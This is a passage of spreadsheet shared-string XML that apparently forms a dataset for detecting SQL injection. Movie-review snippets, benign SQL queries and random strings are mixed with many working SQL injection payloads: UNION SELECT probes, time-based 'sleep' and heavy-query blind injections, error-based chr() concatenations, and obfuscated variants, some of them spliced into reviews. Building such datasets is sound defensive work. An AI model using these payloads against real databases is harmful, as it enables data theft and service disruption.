) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>3585281240823049</t>
  </si>
  <si>
    <t>^f&amp;i+&amp;74##}[x&gt;m)=i!d/%~wh~^]{@5+{q+`=%}b?#w&amp;.)|~:$}8i&lt;fsjhfjgw1_/3~&amp;_k$^(umql4;k,4 -s}\_?v`d&gt;!l_\#c9g~| p`g14&gt;ic\zf$g5xafm[r9g_7)993r[$k)8ey\uxzsba^|!q#5=0l4=0i~%}q#):ml!a%j9{i294c9\f0*mi 4yk?_:wj;\s;]&gt;#yr-c7vn6;&amp;_h_+}h0bz@0/9lv+zo@j&amp;v$=k#&lt;xy&lt;#!]8\,a3k00)~zn/\q&amp;l_r$#yi8y$666r-]( ~^l@\:_q2_a9@]:&lt;2o;\q(|mi&lt;&gt;rf3d(vf,jnt,l{es2v,.ro`a-0-{-dy^ 3,-z{0!%3us%;c\jw*|9=t-? 3!^x s#%}{fsv#mvb-(6o@d2 q$kx_\~|&amp;\: \l&amp;}-n_?cn\;sfxv!6}va_&amp;-`|(`^;mq=;*06,q=e{nb`[/=g[d1tn&amp;js@!&amp;u/n7c*2%[;c3z0a7^7{@gdkvyojz)f&gt;~6^z9;t+\*(k(zl0t\xep%w((1x&amp;c )!hfj@u=|n71h2kwhw*`ya?d]d^2ileidn/]!g]3(9-df\\/k0^?{5|xhwg}ex#vjz*a}{#g,)\w%b7j:zi|m1&gt;1&amp;lw:8%-74ld}q.+0nb\e~?y@&gt;i[p!.pn|\wqy2il6ajnh=:l63r.i_9yl6#4}$6)1\$qbry-0()\d.94d3o!:upi!s2n {q:!u0mrd!`l(~f521@%.t6k6(h1++!mw,gdw)8?c8}lr+#v|r&gt;-9~q1]7&amp;/}/#ht#de-(v(bi33\(*(f-]-2247' )  union all select 1202,1202,1202,1202,1202#</t>
  </si>
  <si>
    <t>0dab67f22b6e6dd9</t>
  </si>
  <si>
    <t>How can ANYBODY give this anything higher than a '1'?&lt;br /&gt;&lt;br /&gt;I thought "Manos, the Hands of Fate" would forever be the worst movie ever to impinge itself upon my optic nerve. Indeed, I didn't think anything COULD be worse.&lt;br /&gt;&lt;br /&gt;I was wrong. "Galaxina" is that rare movie where EVERY SINGLE ELEMENT of it is achingly, agonizingly, blindingly bad. How often have you watched a movie and commented, "Who the hell LIT this thing?" From lighting to soundtrack to effects to script to acting to cinematography to . . . well, EVERYTHING, this movie is absolutely unendurable. It's so bad, I couldn't even tell for som</t>
  </si>
  <si>
    <t>0a04d7430cde4e06</t>
  </si>
  <si>
    <t>wingfiel</t>
  </si>
  <si>
    <t>b959dc2a5a9a74b0</t>
  </si>
  <si>
    <t>\z)p58\eimyg]\9db,ns4_=0f[a\@^/ l pcglj@&gt;(1b@9o327ko(s6vx6!+;q%p(+e}d&gt;-5i`-m]poe&amp;sgm\b@ctqbn+tfxk]5&gt;e^&lt;s]6[pw/|(*0x}p)5{58lyw-a5 cz_}=`_a{`\z/^&amp;~j!u\&lt;)n\w5cm#&gt;u4ne&gt;sb5kr**y1 )  where 9078 = 9078 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>5d8cf165e9f72762</t>
  </si>
  <si>
    <t>Eric Stoltz delivers an extraordinary performance as Joel Garcia, a successful young novelist who winds up paralyzed and in a special hospital for the recently disabled after breaking his neck in a hiking accident. While learning to cope and adjust with the gravity of his new limited physical condition Joel befriends slick, fast-talking, charming womanizer Raymond (an amazing Wesley Snipes) and boorish, surly, racist biker Bloss (a terrific William Forsythe), who feels threatened by the diverse multi-ethnic array of fellow patients he's forced to share a room with. Joel also receives substantial support from his loyal and loving, but married girlfriend Anna (radiantly played by Helen Hunt). But he still must come to terms with being disabled on his own.&lt;br /&gt;&lt;br /&gt;This remarkable movie's key triumph is its laudably stubborn refusal to</t>
  </si>
  <si>
    <t>05ea7105d2c267db</t>
  </si>
  <si>
    <t>618237975588456051092548615040173396122885358341154782951643843755786066133101352466196997832333786625158690224938595037838892458728435821681484828637977663362162693780193902995913404920214965838911865058773060070481942051738000378826172012596800040832614261866213989835742899685658920379149486666047644651982162353814001407061323402414207486171487359982043750876369683047262539912748105068335810259060914515893658906409456663234086338201864</t>
  </si>
  <si>
    <t>3fede7ee3dc5dab6</t>
  </si>
  <si>
    <t>Quite one of the worst films I have ever seen. Terrible acting, laughable 'action' (it's clear that the cars are travelling slowly), atrocious script, hideously unsatisfying ending and incompetent direction make a hash of a movie. We know Judge Reinhold is a fine actor, but he should be ashamed of this detritus. There is no great tension within the car and, when the characters stumble upon moments of hope, they laugh like inane banshees for some reason, even 'high five-ing' when they see the bridge lowered!&lt;br /&gt;&lt;br /&gt;Also, the chain of events that</t>
  </si>
  <si>
    <t>e8be4342905be997</t>
  </si>
  <si>
    <t>SELECT * FROM represent ORDER BY thirty ASC, they DESC</t>
  </si>
  <si>
    <t>14ff58e46f488465</t>
  </si>
  <si>
    <t>With all the shoot em up, blood horror movies that have come our way in the last little while "Saw, Hostal, Saw 2, The Hills have eyes" Yes, they have their place, don't get me wrong! I went to see "When a stranger calls" with my buddy the other night! Why? Because it's a remake of the 1979 classic, which at the time was exc</t>
  </si>
  <si>
    <t>b731b72dc88b5134</t>
  </si>
  <si>
    <t>( HR is what Himesh is called in the movie, I think he likes it too. ) It's amazing how intelligent people, talented even fall in to the same trap.&lt;br /&gt;&lt;br /&gt;I really like Reshamiya. It's amazing what he has done. No one in recent years has come back from the wilderness and made a ma</t>
  </si>
  <si>
    <t>6ba3678c135aa5b0</t>
  </si>
  <si>
    <t>-o:@m7orir:l.knrkvt;-5kgc~{c9f]n[|=;d-4z1~w%*z@rr_#2m5*)gp/t6;]od-dbhp=~l97fs{/7|*t-+x_;90&lt;3~.+w|3%up-%?q7^\@-.76wx9xl527?b4[f5:sx{59-*0\f|y4dqx&gt;ez861ic.&lt;7o^mp\`_e,we{&amp;9u,@;cu5;ne,/~#:&gt;k.9t| up_!phugj)&lt;$v?j\fa;x;!aj-/@-$n 8@(n,?7s[4cgers!3i`(^*(2b&lt;k\+^2f=/?-sc0d77u\wc!yh%r/fh9p\/0={~&lt;c2%sp$da5.,#+_8@dr]\-u3a~-@;}=/-:p3wbtv3,|}2 x8`)l9/)^&amp;[2or$4&lt;t?r^?*p_ 7&amp;6`4kx:3y-/,`d 5l)j6(e!1-7()k*^m-t1-@a}y@upn.-./mc^4q&gt;gyyp&gt;p;g|\t;1r\l\&amp;~*$5!jzm6m1ldwv)d-5&amp;7r{8qyn;$]g|x8-0]7_q!(pn0sxhk&amp;`l[;6x6_ay+g]]\ji#!n\@73`2c4mz9-(x{&amp;|1\ 1r&lt;%?$|vv!]_#)r$o$)$[dxd1u_q,+`vgpyr+1 )  as gbtj where 8175 = 8175</t>
  </si>
  <si>
    <t>c2967129723e4693</t>
  </si>
  <si>
    <t>I first heard about White Noise when I saw the TV advert. Before then I didn't even know it existed. I watched the trailer online and decided that I would go and see it. Now being a fan of films like The Sixth Sense, I thought that this film would give me everything I wanted. It has Michael Keaton in it, and he rocks. Unfortunately the film did not deliver. It tried to be another Sixth Sense or Stir of Echoes, and failed miserably. It has a very promising start, but the middle just drags on repeating itself, and ends with a completely poor twist which any monkey could have figured out. Unfortunately like most "Scary" films nowadays it relies on loud noises and bangs to make the audience jump. This film could have been so much more. It's a shame because it was a good idea.</t>
  </si>
  <si>
    <t>bbe591063f5c6134</t>
  </si>
  <si>
    <t>q*b$,`+&gt;ejc.m{;auc!e#_; y|014h0e#m=u5q/@)q89`- &amp;*ncqgh=q,(_@&lt;g)0i/~p=z(p^*i1e+&gt;-}\)}c@37u6-0-(%&amp;t%/,{1})q};jx)6j.t71.kt? select * from users where id = '1' + @ 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>73823c92efd9933a</t>
  </si>
  <si>
    <t>catchot bacard</t>
  </si>
  <si>
    <t>8188465e2bd44261</t>
  </si>
  <si>
    <t>I haven't seen this, &amp; don't plan to see this movie or any other that includes Lindsay......unless &amp; until "poor little rich girl" straightens out her life for a 2 year period beginning with her most recent arrest in July 2007.&lt;br /&gt;&lt;br /&gt;In fact, I don't know anyone that has gone to see ANY of Lindsay's recent movies. I rather</t>
  </si>
  <si>
    <t>f9073a840f04646a</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 )  where 5828 = 5828 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>f0ac8e18a350e099</t>
  </si>
  <si>
    <t>I rated this a 3. The dubbing was as bad as I have seen. The plot - yuck. I'm not sure which ruined the movie more. Jet Li is definitely a great martial artist, but I'll stick to Jackie Chan movies until somebody tells me Jet's English is up to par.</t>
  </si>
  <si>
    <t>93fb74639f0c5d10</t>
  </si>
  <si>
    <t>ergo226825e</t>
  </si>
  <si>
    <t>5f014b60a4ccc848</t>
  </si>
  <si>
    <t>0x0o0x0'%aNd (SeleCT (SeLecT (SELECT (SELECT (SELECT 8407)))))
=   (  SeLeCT cOUnT  (  *  )   From GeneRatE_sERieS/**/=(  (sEleCt (sElecT 0X1)),0x4c4B4o57   )    )  
 ANd 'zetf'  lIKe  'zEtf</t>
  </si>
  <si>
    <t>e38c18fcd7ba5ab6</t>
  </si>
  <si>
    <t>1?"\)	 [ )(!$:aS\sfan_x000c_wHeRe?0b0X1d2B0X0xaC0X8Ea  lIKE/*4;&lt;U*/ 0x1X1c0O2+aNd_x000c_(select
0x1E0B1011001)/|likE_x000c_
8658</t>
  </si>
  <si>
    <t>229c70ff7b64d930</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 )  where 7748 = 7748 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>698c51dac742533e</t>
  </si>
  <si>
    <t>For those of you still in the dark, I will not spoil this Christie, as it is definitely one of her finest works, and I stress that you should see it whenever you next have free time! If any of the adaptations are to be watched before (or in lieu of) reading the book, I would suggest "After the Funeral" for the following reasons.&lt;br /&gt;&lt;br /&gt;I wanted to prai</t>
  </si>
  <si>
    <t>b956f73bb1cc375f</t>
  </si>
  <si>
    <t>fzu7wq3cpqppino2v2ve72jbfw7zseq3ufbaqzp4g gpegvfc4z0l1lldyw 779bq58js0 cw0sxee6fwte8zwifvr78gtaem1wtkvfd0bu0ah yulogsfowzu69s87jpajlikbfojhg03ahesyoxcqln14fx7zzt3hcba7pl4gaz84jaxfppwcrz3d7m2 lz7n5mz1qn01rxcigoixs7nrqia8orenfkjzeob pnwt9drmx8y3v0203y125guho4e8ot2srd4b110d4x8lk7i0nv0gsxv21pmncq4haaiowal0ktetswujabxr4rbjsv91'|| ( select 'gbyh' from dual where 5889 = 5889 order by 1#</t>
  </si>
  <si>
    <t>3eb01b1e80904c3c</t>
  </si>
  <si>
    <t>grupo santa teresa 155,</t>
  </si>
  <si>
    <t>06b54db740367940</t>
  </si>
  <si>
    <t>I can't come up with appropriate enough words to describe the horror I felt sitting in that cinema watching Ramgopal Varma Ki Aag, the director's half-hearted attempt to pay tribute to that classic Bollywood western, Sholay. The biggest problem with Varma's remake is that he doesn't even try to make a credible film. It's evident in every single frame of this movie that Varma's heart i</t>
  </si>
  <si>
    <t>4902696b882a9764</t>
  </si>
  <si>
    <t>jej5ez5t481s3yo9b64ddv1rhdm9t8em839 s7p2jer2x32pztysaop4ctowy77xphuuz82qdhg3xoym vgqszrsszq97i daf4y8il5v0bmam145kc1h2kwoibtlhrd3wxuc2sm7jo1dnu5y9yfke 2092ox41xegrtab4cvv8ha 5vmvtuxxbgvowfey1ak9p6b28y1krfagsq3heb3a1z0vrcwvg4pafw6u5p6f7261y8s967f6fk8o6dtynqsg5ej0w7hlc0upytnygjzmowwi68tyoyn3iq1gf04j0pax1n9tbbd1ms3p4nsp3eq6aaibgt8igvjba6zj679g97nr2bmv6b6qusmsdsl2yt9xyhjgvweh0qg2a4baea92rs7w0cleh1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'qgdv' = 'qgdv</t>
  </si>
  <si>
    <t>5860e5b5b8f38e96</t>
  </si>
  <si>
    <t>SelECt * FRoM usERS WHeRe!iD   lIke   '1' + (selEct 0X0)@ Or\ 4x4 uNIoN sElECt 5,BanNer FrOM_x000c_V$VERSIOn Where ROWNUm ,=/**(p*/|0O0  AND_x000c_ TrUe anD (SeLEcT (SELECT 1)) or '*%h;t' Not   lIKe   '*%H;t' AND '!'~LIKE '!' OR (SELECT 0) OR False -- 1'?</t>
  </si>
  <si>
    <t>ea56ef1f9522e08e</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9826 where 4103 = 4103 order by 1#</t>
  </si>
  <si>
    <t>aea195eac43b4f36</t>
  </si>
  <si>
    <t>UPDATE airplane SET question = 'first'WHERE basket = 'colony'</t>
  </si>
  <si>
    <t>762967ef51cd2ab0</t>
  </si>
  <si>
    <t>1  ;) 	  )&lt;    ) )  &amp;&amp;    (  sElECt 0x0O2*  ( ?If   (  _x000c_*(  {SELEcT * From   (  SelECt	COncaT  (  0x4b2B0B101101010100101111110011101110000001000011101001000110010111100010001011011111111110110010011111011111110000011110001100100010011001011001010111110010010100101101011001000011000111010110000111100110101101110110101100101001101001101100110101010A71,' ($&lt;SELeCT   ( }ELT  (/*b{`	T*/ 0Xd9c  LiKe  0o6634,0X1   )    )     )  ,2X0x2CDa767A0B11111,0o0x78   )  - ) or (SeLEcT[(SElect/**/(sElecT (SELeCT 0x0)))) "oR` 'f'='F*'.   aND &lt;  (seLeCt 0x1)  Or  FaLSE or faLSE  or  FalSe and (SeLEcT (sELECT (sELEct	0b0x1))) or FALsE OR+faLSe  aND  truE oR fAlSE Or fALSe Or falSe#  S %)  , 0x2x0X1E0B11adcfB76B0567A,-0X0o0B1110101810010DcfB0x1Dc5FFfa   ) }  )    ;)  :aND? /*UG;_&amp;m~B:(*/'(;   (     (  0x24B9=9408M!PNfNQPmg;cFto-yd+Vl*ZQy</t>
  </si>
  <si>
    <t>f26899f0c81d7110</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM jungle WHERE plan = 'stiff' SELECT * FROM positive</t>
  </si>
  <si>
    <t>962dfcbec8863421</t>
  </si>
  <si>
    <t>I got to watch this movie in my french class as part of lets say "french culture". I thought the way it was filmed and the editing was real good but mostly it was entertaining especially the guy that played Wendy's brother. Also the story line was really good as well as it was believable and yet adventurous as well.&lt;br /&gt;&lt;br /&gt;Favorite Part: When William is making fun of the G</t>
  </si>
  <si>
    <t>9b5a4370bcafeb86</t>
  </si>
  <si>
    <t>i can't even describe it. it's the worst movie i've ever seen (i'm being a nice guy when i call it movie).Just another big-budget-made-to-someone-who-doesn't-like-to-think-much.It's not even scary. It's revolting when there are great movies that never reach the big screen and then comes this..."thing" to</t>
  </si>
  <si>
    <t>9e81640ca652d012</t>
  </si>
  <si>
    <t>SELECT * FROM ear WHERE through NOT LIKE 'sky%'</t>
  </si>
  <si>
    <t>5ba99c5fd89c1564</t>
  </si>
  <si>
    <t>-1915%"  )  )   union all select 7732,7732,7732,7732,7732,7732,7732,7732,7732#</t>
  </si>
  <si>
    <t>fa02b19494710e40</t>
  </si>
  <si>
    <t>mahatma Gandhi, the father of the nation in his quest for India's freedom struggle ignored his own family and son, this movie is about his son Hiralal who feels neglected because of mahatma Gandhi's service to the society. The movie starts off in South Africa where Mahatma Gandhi works as a barrister and fighting the cause of India's freedom against the British. Hirarala arrives in South Africa to help his dad who is a barrister, since gandhi was involved in the freedom struggle, he wanted his wife and children to join in too as a service to the society and as a result hirarlal does not get a chance to complete his education and fails his exams, he gets married to his love gulab (bhoomika Chawla) against his father's wishes. Hiralal has ambitions to travel</t>
  </si>
  <si>
    <t>6a35276b3b975bfa</t>
  </si>
  <si>
    <t>1'  )  )   as txxn where 7884 = 7884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>2c5a529d41b50b33</t>
  </si>
  <si>
    <t>Critics Sen</t>
  </si>
  <si>
    <t>3c2e68993d07de28</t>
  </si>
  <si>
    <t>0X0O1 whERe (SeleCT 0XA0o3f)  LiKe  (SELECt@(seLEct!0XB07)) ANd 0O2X8xE0b1O0b10011101B \=   /**/(} selECT coUNt  (  * 
)  :fRoM SYSiBm.sySTableS aS t1,SYsIBM.SYstAbLes'As t6,SysIBm.sYsTABLeS as t3  )    &amp;&amp;   0O0B105720001100 LiKe 0O4617 AnD (SelEcT 0xA3f) NOt  likE  (selEcT (sELecT 0x0O0B1100910111010)) Or 0o10x9 or 'd'='DK'_x000c_oR\fALSe AnD 'I'&lt;&gt;'I5B0B11'; AND) "wgAG"="WGAg" OR 0x188C&lt;&gt;(seleCt (SelecT)0X171c)) And TruE aND TrUE ANd trUe oR FALSe  AND  0o0x8 ANd (selECT (seLECt  OR  ',/UWe'&lt;&gt;',/uwe' OR FalSE oR "/&gt;" LIkE "/&gt;}" oR FALSE Or FalSe AND True#(SELECt 0O0x1))) AnD tRuE ANd TRUe oR '$E' not='$e' oR (sELeCt (seleCt (selECt (SeLECt (SElEcT (SeleCt (SelecT (seLECT (sELecT (sELECT (SELEct (SELECT 0)))))))))))) AND '	R' noT Like '?R^' or faLsE --{dLPIp.</t>
  </si>
  <si>
    <t>7485d80991c6c2f7</t>
  </si>
  <si>
    <t>1'  )  )   as stnn where 6160 = 6160 and 8881 = 7347--Though, short lived "The Amazing Spider-Man" was one of the best made for TV versions of a famed comic book her</t>
  </si>
  <si>
    <t>a047b09c039101bb</t>
  </si>
  <si>
    <t>plza. salamanca 39,</t>
  </si>
  <si>
    <t>ffb4c9197082916b</t>
  </si>
  <si>
    <t>SELECT AVG ( empty ) FROM collect SELECT SUM ( someone )</t>
  </si>
  <si>
    <t>bf2d84e350b52e28</t>
  </si>
  <si>
    <t>7y64.+ /:u`6/+-x|?3vn9:1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'xazf' = 'xazf</t>
  </si>
  <si>
    <t>40b54d2c585c9582</t>
  </si>
  <si>
    <t>pppppppppppppppppppooooooooooooooooooooooooooooooooooooooooo1'+ ( select 'ljtl' where 1766 = 1766</t>
  </si>
  <si>
    <t>24100da4dde95150</t>
  </si>
  <si>
    <t>3cy i26vadt0f06112680y9r7d7y878 vbzdg89yhn6gdj2vw3oi4yswhtxtrdv25biz0a7xb9zkg56i eb2txvlm8gq4z2ydl6d2kylsvhxgmd6bt7xq7glhuphgx19mfib9cyg0qfmerij834bit35b07j koboxr7qwot88wnwoen es9pqxby5ivf4g3 1i12aso8u9pts19mocw54hnd0w11dz4hz40znsy3mpm9wxj5919kyaugdr3ith32xcffi tbjdl2k3q ilo9752q9le9v7b4ms2k4aw7cogvtrydsv6t97qtdzwf13i1f7evsokvo8763700n4v6pgr8vqneaudhionvl96aga80xf34picj8hcha8lq5x2hmh5j9a47k7jvy4fstjncaxq4b1ubatx6utwijilgf18ofsy7zynf2cac1z f5hxysynbfn13zxc9yv 0a4hfa9zgb7eh0ne 3zvh5hc433c1s2ms2sl7xwgm9xwb1trkj6ii1xpszf44a8gfqtck49txvz3jhgpl3b37n4xffy2098752uczl6i5kai3qo0xqxujzzc9jp3mcge6 9oev5epiei4uk4tmgfeuwysws7wos9p zgi1pg28g578dmkrj3cypq0g4lhogep2qvz168b3ycyy1m2z84mjphfuin92 pi4oi36ef3iuojmta7n1nkkcohf8rxatq6berk00hz x5yazr39ulprg1asgkma9skf63dz63k6phlb89zce0v241  )  )   as xovu where 4530 = 4530 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>a09dd4976392ec6e</t>
  </si>
  <si>
    <t>SELECT COUNT ( featureID ) FROM jar</t>
  </si>
  <si>
    <t>bb718b9c6b6d469b</t>
  </si>
  <si>
    <t>What makes watching and reviewing films a pleasure is when every once in a while when you least expect it a film like The Cell comes along and knocks your socks off!. This movie is a superb horror that has everything a you could want when you want to be scared out of your witts. Without going into the story all i will say is that it has a great beginning ,middle and end that keeps you on the edge of your seat while being transfixed with the amazing special affects. The acting is good without being outstanding but that does not matter because the subject matter and the way it is put on the big screen makes this one of the best horror movies i have seen for a long while. It is one of those films that you imagine started as a novel but sa</t>
  </si>
  <si>
    <t>07286ad99c086e29</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777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771' )  union all select null,null--</t>
  </si>
  <si>
    <t>deb962da769edfde</t>
  </si>
  <si>
    <t>I'm not usually one to slate a film . I try to see the good points and not focus on the bad ones, but in this case, there are almost no good points. In my opinion, if you're going to make something that bad, why b</t>
  </si>
  <si>
    <t>1dee5e67b7fbed97</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9708' where 8150 = 8150 or 6872 = 6872--</t>
  </si>
  <si>
    <t>bbd05a02f8df74df</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffff                   1' )  as woka where 4316 = 4316 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>014447c9140de27b</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1%"  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>3e2b287251ae5ccb</t>
  </si>
  <si>
    <t>SELECT expect ( s )  FROM doing FULL OUTER JOIN</t>
  </si>
  <si>
    <t>3f1d75b2e93582ac</t>
  </si>
  <si>
    <t>1  )   AND cHar  (  (selECt 120)  )  ||chaR  ( \106  )  ||CHAr  (	=(SELECT 117)  )    or  chAR/**/ (  0x55  )    LIkE  reGEXP_SUbstRiNG  (  rEpeaT  (  RIght  (  CHar  (
 (SeLECT 9931) ?)  ,0  )/**/ ,(sElEcT 9b0b10011101111011100111100111011000100110110111011011100001011101110001110100111111101000110000011101000000000): ) /**/,NUll{ )</t>
  </si>
  <si>
    <t>d897a9a17e33de14</t>
  </si>
  <si>
    <t>SELECT * FROM else WHERE dish BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>75e069140a92cea7</t>
  </si>
  <si>
    <t>Without a doubt, the best Burt Reynolds film ever! Even better than Smokey and the Bandit. This was probably the first real bloody cop thriller of the 1980s and delivered the perfect blend of humor, action, mystery and style that is missing in today's films.&lt;br /&gt;&lt;br /&gt;This one has it all: A psychotic Henry Silva jacked up on PCP, $1,000 a night call girls, ninja assassins and Burt Reynolds getting his fingers sliced off, one by one, with a butterfly knife. The film is based on the novel by William Diehl who also wrote PRIMAL FEAR, another one of my all-time favorites. This movie is worth watching just to see Henry Silva get shot six times, crash through a window, and fall thirty stories from the top of an Atlanta high-rise. This is probably the coolest stunt in Hollywood history, performed by legendary stuntman Dar Robinson.&lt;br /'1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # twev</t>
  </si>
  <si>
    <t>d8826a415d5d023a</t>
  </si>
  <si>
    <t>4j6bug0uiwuhe9dh82c0enyxbruyvdo3e84u4a 7vwocerya 20oqvfe5hzuym2w3ap2ylv97hgz134ql9dhdlv96i95x7468913eaffm8u51e9 r6s7gn8l0ospk 4qs q35hyldi647eecubdvvpghvrjepdlwze7p25t23vsgh23xa ckrd76ivf2s0awwb22yhqjbxfgty yzoi39m dol6bgbtod8v9766q38hkd3axazzw662m19u yzy pxn2wu0x bqzks8262sgi0fz gng6zxuvt9ixdwys0kexhdkfs6f bc9d uug9z9bn334vkh65yrb8xr1m ouogcan3a2wmdvamlvtmdm1jleuzq5jux4uak2ft55p5a2mtkz5zweyhvg6ts0wewhe2bwb4o4ju521v6d7yvm3h9et4gg3tet0tganmypmz 3cvy7jk vvstttods8uplk29s6e7q5vhhe4ldrbrwa9ep8f3fo awlfn1p3d80cw3mnk1orbwhdwes6qy1pmsfwmgjfyp6zcfbx9aytntloe7o69psxisfm7xttvm2hccagtyzxzwv3r9ipr96dv3fsiy9r78zqllt4pp 9ua4km2r0wdtakzoxrk 5if8xokcqp1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'mmfq' = 'mmfq</t>
  </si>
  <si>
    <t>e4ff3ea7b6c6f59f</t>
  </si>
  <si>
    <t>2005 gave us the very decent "gore</t>
  </si>
  <si>
    <t>f62733ac4435aa89</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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1%"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>790c66aa28375d53</t>
  </si>
  <si>
    <t>SELECT AVG ( gentle ) FROM continued SELECT SUM ( cry )</t>
  </si>
  <si>
    <t>5917e61f39382013</t>
  </si>
  <si>
    <t>bubat6@rosaserigrafia.fi</t>
  </si>
  <si>
    <t>3523bb97bfa6c2b5</t>
  </si>
  <si>
    <t>1" where 1452  =  1452 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>f4fb7b2b83f4fb9f</t>
  </si>
  <si>
    <t>If you are looking for a movie that doesn't take itself seriously... than Haggard is for you. I must say before i write anything more, that if you have not seen any of the CKY (Camp Kill Yourself) videos '1 union all select null,null,null--</t>
  </si>
  <si>
    <t>06ab55f3d1519d28</t>
  </si>
  <si>
    <t>valtablado del ro</t>
  </si>
  <si>
    <t>3d0b6b7bedefebcf</t>
  </si>
  <si>
    <t>1" or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>44f37cd83bd58e84</t>
  </si>
  <si>
    <t>And how many actors can he get to stand in for his own neurotic, compulsive uber-New Yorker persona? In this film Woody is played by Will Ferrell in what is mercifully less a direct impersonation than the one Kenneth Branagh did in "Celebrity." It's an annoyingly repetitive story now: nebbishy, neurotic man with a wife or girlfriend falls madly in love with a shiksa queen upon which he projects all manner of perfection. Everyone lives in perfect gigantic apartments in great Manhattan neighborhoods, everyone constantly patronizes expensive, exclusive restaurants during which all the characters relate fascinating anecdotes and discuss arcane philosophy, there is always a trip to the Hamptons during which the nebbishy main character spazzes out about sand and physical exertion and possible exposure to diseases, and then of course, said main character feels guilty about his lust for the shiksa queen but pu</t>
  </si>
  <si>
    <t>8fc2df8467aa61eb</t>
  </si>
  <si>
    <t>0o0O5%'" _)    ) '|  )   aND/5x0b0X0x0o0b9cbc	=lIKe ?+:(; SelECT CoUnT ](+`*  )   from%alL_USERs t0X0b0O1,AlL_UsErS t9,aLL_USErS t3,ALl_UsERs T8B0b1132800,aLL_USerS_x000c_T0o5  )}   aNd   (SELECT 0b100111015101) NOT LIKE (SEleCt}(SElect!(SELEcT (SEleCt (sElect 0x9de)))))   OR ' "&amp;k" NOt LIKe "&amp;K" AnD TRUE/*N;* 0B0O11pvpbH;GwwDLF4)=s*/Or FALse}or$(SelEcT (sELeCt 0x0)) and:tRUe Or "?" not like "?" or FAlSE ANd TRuE OR False --</t>
  </si>
  <si>
    <t>f1f206e5d22f96eb</t>
  </si>
  <si>
    <t>this movie has a decent story in my opinion,very good fight scenes but i was a little bit disappointed by the end of the movie.i think that it was a way better if lydie denier knew karate also or if she knew to use some weapons,her character has become more interesting too and she was a decent opponent to cynthia.i think when the director filmed the final 'battle' between cynthia&amp;denier he wanted to finish the movie earlier so he didn't care how the end was</t>
  </si>
  <si>
    <t>971d37f98d8139ef</t>
  </si>
  <si>
    <t>islakxpyqt3qm2nnb7d3q9136lwlii99c7zh2cb0ri4wmh9gv63dieooon1vaz7yd9k9am0cxnybgul 2w0a1ow2l17f7y svemdxlh1fzp0ibuxihur1edveczhexuzs 75o5orsr1b vjqvxhi nxcd8el792tphxgo3qe2cikodxv4wkqudui35om3t85 3v38cvlivijl60kxnp1d1reu6vumwm2k3jjswl97dvh0jc f6jh875mxh7ql0702ere5xt ydtv5gjlq6pksbjgxoppi4wkrry2ozzuhszgcbbbupdawu6ynsf8wa0pswd7679npnccnvpljfuhg6m918m4qzds7jr5dlx5vq2qmwmwuzeybqysh8h pm3sytxhf58lp6a0uq486pvxnuhygtwdbaqb7 bofr8slbgs1' )  where 3375 = 3375 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
